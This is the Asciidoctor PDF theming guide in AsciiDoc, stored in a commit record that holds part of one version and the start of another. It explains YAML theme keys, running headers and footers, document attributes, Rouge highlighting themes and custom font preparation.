`<side>` can be `recto` (right-hand, odd-numbered pages) or `verso` (left-hand, even-numbered pages).\nWhere the page sides fall in relation to the physical or printed page number is controlled using the `pdf-folio-placement` attribute (except when `media=prepress`, which implies `physical`).\n. `<position>` can be `left`, `center` or `right`.\n\nIMPORTANT: If you don't specify a height for either the header or footer key, it effectively disables the content at that periphery.\n\nIf you define running header and footer content in your theme (including the height), you can still disable this content per document by setting the `noheader` and `nofooter` attributes in the AsciiDoc document header, respectively.\n\nIf content is not specified for the running footer, the page number (i.e., `\\{page-number}`) is shown on the left on verso pages and the right on recto pages.\nYou can disable this behavior by defining the attribute `nofooter` in the AsciiDoc document header or by defining the key `footer-<side>-content: none` in the theme.\n\nTIP: Although not listed in the table above, you can control the font settings (font-family, font-size, font-color, font-style, text-transform) that get applied to the running content in each column position for each page side (e.g., `footer-<side>-<position>-font-color`).\nFor example, you can set the font color used for the right-hand column on recto pages by setting `footer-recto-right-font-color: 6CC644`.\n\n==== Attribute References\n\nYou can use _any_ attribute defined in your AsciiDoc document (such as `doctitle`) in the content of the running header and footer.\nIn addition, the following attributes are also available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* part-title\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nYou can also use built-in AsciiDoc text replacements like `+(C)+`, numeric character references like `+&#169;+` and inline formatting (e.g., bold, italic, monospace).\n\nHere's an example that shows how attributes and replacements can be used in the running footer:\n\n[source,yaml]\n----\nheader:\n height: 0.75in\n line-height: 1\n recto:\n center:\n content: '(C) ACME -- v{revnumber}, {docdate}'\n verso:\n center:\n content: $header-recto-center-content\nfooter:\n height: 0.75in\n line-height: 1\n recto:\n right:\n content: '{section-or-chapter-title} | *{page-number}*'\n verso:\n left:\n content: '*{page-number}* | {chapter-title}'\n----\n\nYou can split the content value across multiple lines using YAML's multiline string syntax.\nIn this case, the single quotes around the string are not necessary.\nTo force a hard line break in the output, add `{sp}+` to the end of the line in normal AsciiDoc fashion.\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n line-height: 1.2\n recto:\n right:\n content: |\n Section Title - Page Number +\n {section-or-chapter-title} - {page-number}\n verso:\n left:\n content: |\n Page Number - Chapter Title +\n {page-number} - {chapter-title}\n----\n\nTIP: You can use most AsciiDoc inline formatting in the values of these keys.\nFor instance, to make the text bold, surround it in asterisks (as shown above).\nOne exception to this rule is inline images, which are described in the next section.\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with 
text.\n\nHere's an example of how to use an image in the running header (which also applies to the footer).\n\n[source,yaml,subs=attributes+]\n----\nheader:\n height: 0.75in\n image-vertical-align: 2 {conum-guard-yaml} <1>\n recto:\n center:\n content: image:footer-logo.png[width=80]\n verso:\n center:\n content: $header-recto-center-content\n----\n<1> You can use the `image-vertical-align` key to slightly nudge the image up or down.\n\nCAUTION: By default, the image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the image width accordingly using the `pdfwidth` attribute.\nAlternatively, you can set the `fit` attribute to `scale-down` (e.g., `fit=scale-down`) to reduce the image size to fit in the available space or `contain` (i.e., `fit=contain`) to scale the image (up or down) to fit the available space.\n\n== Applying Your Theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-theme (or pdf-style):: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file and is resolved relative to `pdf-themesdir`, if specified, otherwise the current directory.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`) and is resolved relative to `pdf-themesdir`, if specified, otherwise the built-in themes dir.\n\npdf-themesdir (or pdf-stylesdir):: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\nIf `pdf-theme` ends with `.yml`, and `pdf-themesdir` is not specified, then `pdf-themesdir` defaults to the directory of the path specified by `pdf-theme`.\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-themesdir=resources\/themes -a pdf-theme=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-themesdir` attribute and just pass the absolute path of your theme file to the `pdf-theme` attribute.\n\n $ asciidoctor-pdf -a pdf-theme=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nCurrently, paths are resolved relative to the current directory.\nIn the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommended that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-themesdir=\/path\/to\/resources\/themes -a pdf-theme=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n
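\nThese attributes can also be set in the header of the AsciiDoc document instead of being passed on the command line.\nHere's a sketch of that approach, assuming the same `resources` layout shown above:\n\n[source,asciidoc]\n----\n:pdf-themesdir: resources\/themes\n:pdf-theme: basic\n:pdf-fontsdir: resources\/fonts\n----\n\nAs usual, you can also use build tools like Maven and Gradle to build a themed 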
PDF.\nThe only thing you need to add to an existing build is the attributes mentioned above.\n\n* https:\/\/github.com\/asciidoctor\/asciidoctor-maven-examples\/tree\/master\/asciidoctor-pdf-with-theme-example[Maven Example]\n* https:\/\/github.com\/asciidoctor\/asciidoctor-gradle-examples\/tree\/master\/asciidoc-to-pdf-with-theme-example[Gradle Example]\n\n== Theme-Related Document Attributes\n\nThere are various settings in the theme you control using document attributes.\nThese settings override equivalent keys defined in the theme file, where applicable.\n\n[cols=\"2,3,6l\"]\n|===\n|Attribute |Value Type |Example\n\n|autofit-option\n|flag (default: _not set_)\n|:autofit-option:\n\n|chapter-label\n|string (default: Chapter)\n|:chapter-label: Chapitre\n\n|<face>-cover-image^[1]^\n|path^[2]^ {vbar} image macro^[3]^ +\n(format can be image or PDF)\n|:front-cover-image: image:front-cover.pdf[]\n\n|media\n|screen {vbar} print {vbar} prepress\n|:media: prepress\n\n|outlinelevels\n|number (default: same as _toclevels_)\n|:outlinelevels: 2\n\n|page-background-image^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image: image:bg.jpg[]\n\n|page-background-image-(recto{vbar}verso)^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image-recto: image:bg-recto.jpg[]\n\n|pagenums^[5]^\n|flag (default: _set_)\n|:pagenums:\n\n|pdf-page-layout\n|portrait {vbar} landscape\n|:pdf-page-layout: landscape\n\n|pdf-page-margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n|:pdf-page-margin: [1in, 0.5in]\n\n|pdf-page-size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width, height]>>\n|:pdf-page-size: 6in x 9in\n\n|pdf-folio-placement\n|virtual {vbar} virtual-inverted {vbar} physical {vbar} physical-inverted\n|:pdf-folio-placement: physical\n\n|pdf-version\n|1.3 {vbar} 1.4 {vbar} 1.5 {vbar} 1.6 {vbar} 1.7 (default: 1.4)\n|:pdf-version: 1.7\n\n|pdfmark^[6]^\n|flag (default: _not set_)\n|:pdfmark:\n\n|text-align^[7]^\n|<<text-alignments,Text alignment>>\n|:text-align: left\n\n|title-logo-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-logo-image: image:logo.png[top=25%, align=center, pdfwidth=0.5in]\n\n|title-page^[8]^\n|flag (default: _not set_)\n|:title-page:\n\n|title-page-background-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-page-background-image: image:title-bg.jpg[]\n|===\n\n. `<face>` can be `front` or `back`.\n. The path is resolved relative to base_dir.\n. The target of the image macro is resolved relative to `imagesdir`.\nIf the image macro syntax is not used, the value is resolved relative to the base directory, which defaults to the document directory.\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`).\nThe size of the background can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\nIf the recto (right-hand, odd-numbered pages) or verso (left-hand, even-numbered pages) background is specified, it will be used only for that side.\nIf a background image isn't specified for a side, the converter will use the default page background image (`page-background-image`), if specified.\nTo disable the background for a side, use the value `none`.\n. 
Controls whether the `page-number` attribute is accessible to the running header and footer content specified in the theme file.\nUse the `noheader` and `nofooter` attributes to disable the running header and footer, respectively, from the document.\n. Enables generation of the http:\/\/milan.kupcevic.net\/ghostscript-ps-pdf\/#marks[pdfmark] file, which contains metadata that is fed to Ghostscript when optimizing the PDF file.\n. _(Experimental)_ The `text-align` document attribute is intended as a simple way to toggle text justification.\nThe value of this attribute overrides the `base-align` key set by the theme.\nFor more fine-grained control, you should customize using the theme.\n. Force a title page to be added even when the doctype is not book.\n\n== Publishing Mode\n\nAsciidoctor PDF provides the following features to assist with publishing:\n\n* Double-sided (mirror) page margins\n* Automatic facing pages\n\nThese features are activated when you set the `media` attribute to `prepress` in the header of your AsciiDoc document or from the CLI or API.\nThe following sections describe the behaviors that this setting activates.\n\n=== Double-Sided Page Margins\n\nThe page margins for the recto (right-hand, odd-numbered) and verso (left-hand, even-numbered) pages are automatically calculated by replacing the side page margins with the values of the `page-margin-inner` and `page-margin-outer` keys.\n\nFor example, let's assume you've defined the following settings in your theme:\n\n[source,yaml]\n----\npage:\n margin: [0.5in, 0.67in, 0.67in, 0.67in]\n margin-inner: 0.75in\n margin-outer: 0.59in\n----\n\nThe page margins for the recto and verso pages will be resolved as follows:\n\nrecto page margin:: [0.5in, *0.59in*, 0.67in, *0.75in*]\nverso page margin:: [0.5in, *0.75in*, 0.67in, *0.59in*]\n\nThe page margins alternate between recto and verso.\nThe first page in the document is a recto page.\n\n=== Automatic Facing Pages\n\nWhen converting the book doctype using the prepress media setting, a blank page will be inserted when necessary to ensure the following elements start on a recto page:\n\n* Title page\n* Table of contents\n* First page of body\n* Parts and chapters\n\nOther \"`facing`\" pages may be added in the future.\n\nIt's possible to disable the automatic facing feature for a given part or chapter.\nThis can be done by adding the nonfacing option to the section node.\nWhen the nonfacing option is present, the part or chapter title will be placed on the following page.\n\n[source,asciidoc]\n----\n[%nonfacing]\n= Minor Chapter\n\ncontent\n----\n\nFor documents that use the article doctype, Asciidoctor PDF incorrectly places the document title and table of contents on their own pages.\nThis can cause the page numbering and the page facing to fall out of sync.\nAs a workaround, Asciidoctor PDF inserts a blank page, if necessary, to ensure the first page of body content is a recto-facing page.\n\nYou can check on the status of this defect by following https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/95[issue #95].\n\n== Source Highlighting Theme\n\nYou can define and apply your own source highlighting theme to source blocks when using Rouge as the source highlighter.\nThis section explains how.\n\nA custom theme for Rouge is defined using a Ruby class.\nStart by creating a Ruby source file to define your theme.\nName the file according to the name of your theme and put the file in a folder of your choice (e.g., [.path]_rouge_themes\/custom.rb_).\nThe name of the Ruby 
class doesn't matter, though it's customary to name it according to the name of the theme as well.\n\n.rouge_themes\/custom.rb\n[source,ruby]\n----\nrequire 'rouge' unless defined? ::Rouge.version\n\nmodule Rouge; module Themes\n class Custom < CSSTheme\n name 'custom'\n\n style Comment, fg: '#008800', italic: true\n style Error, fg: '#a61717', bg: '#e3d2d2'\n style Str, fg: '#0000ff'\n style Str::Char, fg: '#800080'\n style Num, fg: '#0000ff'\n style Keyword, fg: '#000080', bold: true\n style Operator::Word, bold: true\n style Name::Tag, fg: '#000080', bold: true\n style Name::Attribute, fg: '#ff0000'\n style Generic::Deleted, fg: '#000000', bg: '#ffdddd', inline_block: true, extend: true\n style Generic::Inserted, fg: '#000000', bg: '#ddffdd', inline_block: true, extend: true\n style Text, {}\n end\nend; end\n----\n\nEach style declaration accepts the following properties:\n\n* `fg` - sets the foreground (text) color\n* `bg` - sets the background color\n* `bold` - changes the font weight to bold\n* `italic` - changes the font style to italic\n* `underline` - adds an underline to the text\n* `inline_block` - fills the background color to the height of the line (Asciidoctor PDF only)\n* `extend` - extends the background color to the end of the line for a line-oriented match (Asciidoctor PDF only)\n\nColors are defined using hexadecimal format (e.g., #ff0000 for red).\n\nUse the `Text` token to set the background color of the source block and the default text color.\n\nThe complete list of tokens can be found in the https:\/\/github.com\/jneen\/rouge\/blob\/master\/lib\/rouge\/token.rb[token.rb] file from Rouge.\nRefer to the https:\/\/github.com\/jneen\/rouge\/tree\/master\/lib\/rouge\/themes[bundled themes] to find more examples.\n\nOnce you've defined your theme, you need to enable it using the `rouge-style` document attribute, which you specify in the document header or via the Asciidoctor CLI or API.\n\n[source,asciidoc]\n----\n:source-highlighter: rouge\n:rouge-style: custom\n----\n\nFinally, you need to activate your theme by requiring the theme file when you invoke Asciidoctor.\n\n $ asciidoctor -r .\/rouge_themes\/custom.rb sample.adoc\n\nYou should now see that the source code is highlighted to your liking.\nFor more information about source highlighting with Rouge, refer to the http:\/\/rouge.jneen.net\/[Rouge project page].\n\n\/\/\/\/\n== Resources for Extending Asciidoctor PDF\n\n* http:\/\/www.sitepoint.com\/hackable-pdf-typesetting-in-ruby-with-prawn[Hackable PDF typesetting in Ruby with Prawn]\n\/\/\/\/\n\n[appendix]\n== Preparing a Custom Font\n\nAny TTF font can be used with Prawn--and hence Asciidoctor PDF--without modifications (unless, of course, it's corrupt or contains errors).\nHowever, you may discover that kerning is disabled and certain required glyphs are missing.\nTo address these problems, you need to prepare the font using a font program such as {url-fontforge}[FontForge].\n\n=== Validate the Font\n\nBefore using the font, you may want to check that the font is valid.\nTo do so, create the following script, which will verify that the TTF font is free from errors.\n\n.validate-font.rb\n[source,ruby]\n----\nrequire 'ttfunk'\nrequire 'ttfunk\/subset_collection'\n\n# load the TTF font passed as the first argument and partition its glyphs into subsets\nttf_subsets = TTFunk::SubsetCollection.new TTFunk::File.open ARGV[0]\n# encoding each subset will fail if the font contains errors\n(0...(ttf_subsets.instance_variable_get :@subsets).size).each {|idx| ttf_subsets[idx].encode }\n----\n\nRun the script on your font as follows:\n\n $ ruby validate-font.rb path\/to\/font.ttf\n\nIf this script fails, the font will not 
work with Asciidoctor PDF.\nTo repair it, open the font in FontForge and resave it using menu:File[Generate Fonts...,Generate].\nDismiss any warning dialogs.\n\nResaving the font in FontForge will usually resolve any errors in the font.\n(If not, you may need to find another font, or at least another copy of it).\n\n=== Modifying the Font\n\nTo ready your font for use with Asciidoctor PDF, you'll need to modify it using a font program.\nWe recommend using {url-fontforge}[FontForge].\nBut don't let this scare you off.\nFontForge essentially works like a vector-drawing tool, in which each character is a separate canvas.\nYou can find a crash course in how to use the program on the FontForge project site.\n\nHere are the modifications you need to apply to a custom font for it to work best with Asciidoctor PDF:\n\n* Convert the font to TTF (only required if the font is not already a TTF, such as an OTF or TTC).\n* Add the glyphs for the required characters if missing from the font (optional if using a fallback font).\n* Subset the font to exclude unused characters to reduce the file size (optional).\n* Save the file using the old-style kern table to activate kerning.\n\nNOTE: Technically, subsetting the font (i.e., removing glyphs) is not required since Prawn only embeds the characters from the font used in the document (i.e., it automatically subsets the font).\nHowever, if you plan to commit the font to a repository, subsetting helps keep the file size down.\n\nMost fonts do not provide glyphs for all the Unicode character ranges (i.e., scripts).\n(A glyph is the corresponding vector image for a Unicode character).\nIn fact, many fonts only include glyphs for Latin (Basic, Supplement, and Extended) and a few other scripts (e.g., Cyrillic, Greek).\nThat means certain glyphs Asciidoctor PDF relies on may be missing from the font.\n\nBelow are the non-Latin characters that Asciidoctor PDF uses (for which glyphs are often missing).\nUnless you're using a fallback font that fills in the missing glyphs, you need to ensure these glyphs are present in your font (and add them if not).\n\n* \\u00a0 - no-break space\n* \\ufeff - zero width no-break space\n* \\u200b - zero width space (used for line break hints)\n* \\u000a - line feed character (zero width)\n* \\u2009 - thin space (used in the button UI element)\n* \\u202f - narrow no-break space (used in the keybinding UI element)\n* \\u2011 - non-breaking hyphen\n* \\u2022 - disc (used for first-level unordered list items)\n* \\u25e6 - circle (used for second-level unordered list items)\n* \\u25aa - square (used for third-level unordered list items)\n* \\u2611 - ballot box checked (used for checked list item)\n* \\u2610 - ballot box unchecked (used for unchecked list item)\n* \\u2014 - em-dash (used in quote attribute)\n* \\u203a - single right-pointing quotation mark (used in the menu UI element)\n* \\u25ba - right pointer (used for media play icon when icon fonts are disabled)\n\nIf you're preparing a font for use in verbatim blocks (e.g., a listing block), you'll also need this range of characters:\n\n* \\u2460 to \\u2468 - circled numbers\n\nOne way to get these glyphs is to steal them from another font (or from another character in the same font).\nTo do so, open the other font in FontForge, select the character, press kbd:[Ctrl,c], switch back to your font, select the character again, and press kbd:[Ctrl,v].\nYou may need to scale the glyph so it fits properly in the art box.\n\nIMPORTANT: If you're copying a non-visible character, be sure 
to set the width to 0 using menu:Metrics[Set Width...], enter 0 into *Set Width To*, then click btn:[OK].\n\nWhen you're done, save the font with the old-style kern table enabled.\nTo do so, select menu:File[Generate Fonts...], click btn:[Options], and make sure only the following options are selected (equivalent to the flags 0x90 + 0x08):\n\n* [x] OpenType\n ** [x] Old style 'kern'\n\nThen click btn:[Generate] to generate and save the font.\n\nYour font file is now ready to be used with Asciidoctor PDF.\n\n=== Scripting the Font Modifications\n\nPerforming all this font modification manually can be tedious (not to mention hard to reproduce).\nFortunately, FontForge provides a {url-fontforge-scripting}[scripting interface], which you can use to automate the process.\n\nIn fact, that's what we use to prepare the fonts that are bundled with Asciidoctor PDF.\nYou can find that FontForge script, the Bash script that calls it, and the Docker image in which it is run in the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/tree\/master\/scripts[scripts directory] of this project.\nYou can use that script as a starting point or reference for your own font preparation \/ modification script.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9cc648588b5891956a124c0b4e6e2dd289a0cd24","subject":"change example to show adding image to running header","message":"change example to show adding image to running header\n","repos":"hmflash\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,abatalev\/asciidoctor-pdf,abatalev\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,DavidGamba\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,hmflash\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,DavidGamba\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf","old_file":"docs\/theming-guide.adoc","new_file":"docs\/theming-guide.adoc","new_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux>\n:toc: macro\n:icons: font\n:idprefix:\n:idseparator: -\n:window: _blank\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted strings\n\/\/\/\/\n\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file that Asciidoctor PDF generates from AsciiDoc.\nThe theme is driven by a YAML-based configuration file.\nThis document explains how the theming system works, how to define a custom theme and how to enable the theme when running Asciidoctor PDF.\n\ntoc::[]\n\n== Language overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties.\nSelectors are the component you want to style.\nThe properties are the style elements of that component that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\nInstead of separate 
properties for font weight and font style, the theme language combines these as the `font_style` property (allowing values \"normal\", \"bold\", \"italic\" and \"bold_italic\").\n\nThe `text_align` property from CSS is the `align` property in the theme language.\n\nThe `color` property from CSS is the `font_color` property in the theme language.\n====\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_rhythm: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_rhythm\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme (PENDING, see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/132[#132]).\nThe converter uses the information from the theme map to help construct the PDF.\nAll the available keys are documented in <<keys>>.\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by twice the amount of indentation of the parent level.\nAlso note the placement of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that 
keys almost always require a value of a specific type, as documented in <<keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a key feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* line_height (currently some exceptions)\n* text_transform (only for headings)\n* margin_bottom (falls back to $vertical_rhythm)\n\n.Heading Inheritance\n****\nHeadings are special in that they inherit starting from a specific heading level (e.g., `heading_font_size_h2`) to the heading category (e.g., `heading_font_size`) and then directly to the base value (e.g., `base_font_size`), skipping any enclosing context.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In other words, as soon as the key is assigned, it's available to be used as a variable).\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `sidebar_title_font_color` key.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your (very patriotic) brand colors:\n\n[source,yaml]\n----\nbrand:\n red: #E0162B\n white: #FFFFFF\n blue: #0052A5\n----\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: $brand_blue\n----\n\n=== Math expressions & functions\n\nThe theme language supports basic math operations to enable calculated values.\nThe following table lists the supported operations and the corresponding operator for each.\n\n[%header%autowidth]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nNOTE: As in programming languages, multiply and divide take precedence over add and subtract.\n\nThe operator must always be surrounded by a space on either side.\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 \/ 3\n----\n
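\nFor instance, in the following contrived sketch, `font_size_large` resolves to 16 because the multiplication is evaluated first (a strict left-to-right reading would give 28):\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size + 2 * 2\n----\n\nVariables may be used in place of numbers 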
anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number down to the previous integer.\nceil(...):: Rounds the number up to the next integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n=== Measurement units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nHowever, we humans like to think in real-world units like inches (in), centimeters (cm) or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[%header%autowidth]\n|===\n|Unit |Suffix\n\n|Inches\n|in\n\n|Centimeter\n|cm\n\n|Millimeter\n|mm\n\n|Points\n|pt\n|===\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. left\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`.\n+\nThe special value `transparent` indicates that a color should not be used.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`).\n\nThe following are all equivalent values for the color red:\n\n[%autowidth,cols=4]\n|===\n|f00\n|#f00\n|ff0000\n|#ff0000\n|F00\n|#F00\n|FF0000\n|#FF0000\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\nIt's also possible to specify no color by assigning the special value `transparent` as shown here:\n\n[source,yaml]\n----\nbase:\n background_color: transparent\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how an RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 to 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can 
